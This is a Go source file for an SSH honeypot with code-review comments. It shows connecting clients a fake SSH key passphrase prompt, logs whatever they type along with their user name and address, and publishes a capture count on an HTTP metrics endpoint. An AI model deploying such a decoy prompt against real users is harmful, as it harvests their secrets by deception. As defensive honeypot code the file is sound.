package main

import (
    "fmt"
    "github.com/gliderlabs/ssh"
    "net/http"
    "log"
    "strings"
)

// metrics_num_passwords counts the inputs captured by handleConnection and is
// reported by metricsHandler on /metrics.
//
// NOTE(review): the counter is a plain int that is incremented in the SSH
// session handler and read in the HTTP handler with no lock or atomic in
// between. Both libraries presumably run handlers on separate goroutines, so
// this is a data race (run with -race to confirm); switching to a
// sync/atomic counter needs a coordinated change at both call sites.
var metrics_num_passwords int

// main starts the two listeners of the honeypot: the SSH decoy on :2222
// (in a background goroutine) and the HTTP metrics endpoint on :8080
// (blocking the main goroutine). A listen failure on either terminates the
// whole process through log.Fatalln.
//
// NOTE(review): both addresses have an empty host part, so both ports are
// bound on every interface. If the host is reachable from untrusted networks,
// consider binding the metrics listener to loopback or a management address.
// NOTE(review): http.ListenAndServe uses a server without read/write
// timeouts and the package-wide default mux; an explicit http.Server with
// timeouts and its own mux is the more defensive setup.
// NOTE(review): no options are passed to ssh.ListenAndServe, so no
// authentication callbacks, host key or session timeouts are configured
// here - confirm the library defaults are what is intended.
func main() {
    log.Println("Starting SSH listener")
    go func() {
        // Register the session handler as the library-wide default, then
        // serve; the nil handler argument makes the server use that default.
        ssh.Handle(handleConnection)
        if err := ssh.ListenAndServe(":2222", nil); err != nil {
            log.Fatalln(err.Error())
        }
    }()

    log.Println("Starting HTTP metrics listener")
    http.HandleFunc("/metrics", metricsHandler)
    if err := http.ListenAndServe(":8080", nil); err != nil {
        log.Fatalln(err.Error())
    }
}

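// handleConnection serves one SSH session of the honeypot. It writes a decoy
// "Enter passphrase for key" prompt that embeds the session's user name, reads
// the reply one byte at a time until a carriage return, logs what was typed
// together with the user name and remote address, bumps the capture counter
// and ends the session with exit status 1.
//
// Everything read from the session and the user name itself are
// attacker-controlled, so:
//   - the amount of input kept is capped, otherwise a client that never sends
//     a carriage return could grow the buffer without limit;
//   - both values are logged with %q, so embedded newlines or control bytes
//     cannot forge or corrupt log lines.
//
// The log line contains whatever the client typed in clear text, which may be
// a real secret; the log destination should be access-restricted accordingly.
//
// NOTE(review): metrics_num_passwords is incremented without synchronization
// while other sessions and the metrics handler may touch it; the variable is
// declared outside this function, so that is not changed here.
func handleConnection(s ssh.Session) {
    // Upper bound on the number of bytes kept from one session.
    const maxInputLen = 1024

    // Send the decoy prompt.
    fmt.Fprintf(s, "Enter passphrase for key '/home/%s/.ssh/id_rsa': ", s.User())

    var (
        input   strings.Builder
        readErr error
        sawCR   bool
    )
    buf := make([]byte, 1)

    for !sawCR && readErr == nil && input.Len() < maxInputLen {
        var n int
        n, readErr = s.Read(buf)
        if n == 0 {
            // Nothing was read, so buf still holds the previous byte;
            // do not record it a second time.
            continue
        }
        if buf[0] == '\r' {
            sawCR = true
            continue
        }
        input.WriteByte(buf[0])
    }

    if readErr != nil {
        // Read error - just log that.
        log.Println(readErr.Error())
    } else {
        metrics_num_passwords++
        if !sawCR {
            log.Printf("input from %s truncated at %d bytes", s.RemoteAddr().String(), maxInputLen)
        }
        log.Printf("%q@%s: %q", s.User(), s.RemoteAddr().String(), input.String())
    }

    // Best-effort close; the session is finished whether or not this fails.
    _ = s.Exit(1)
}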

// metricsHandler answers /metrics requests with a single text line,
// "num_passwords <count>", where <count> is the current value of
// metrics_num_passwords. The request itself is not inspected, so any method
// and any caller receives the value.
//
// NOTE(review): the counter is read without synchronization while SSH
// sessions may be incrementing it.
func metricsHandler(w http.ResponseWriter, req *http.Request) {
    // Fprintln joins its operands with a space and appends the newline.
    fmt.Fprintln(w, "num_passwords", metrics_num_passwords)
}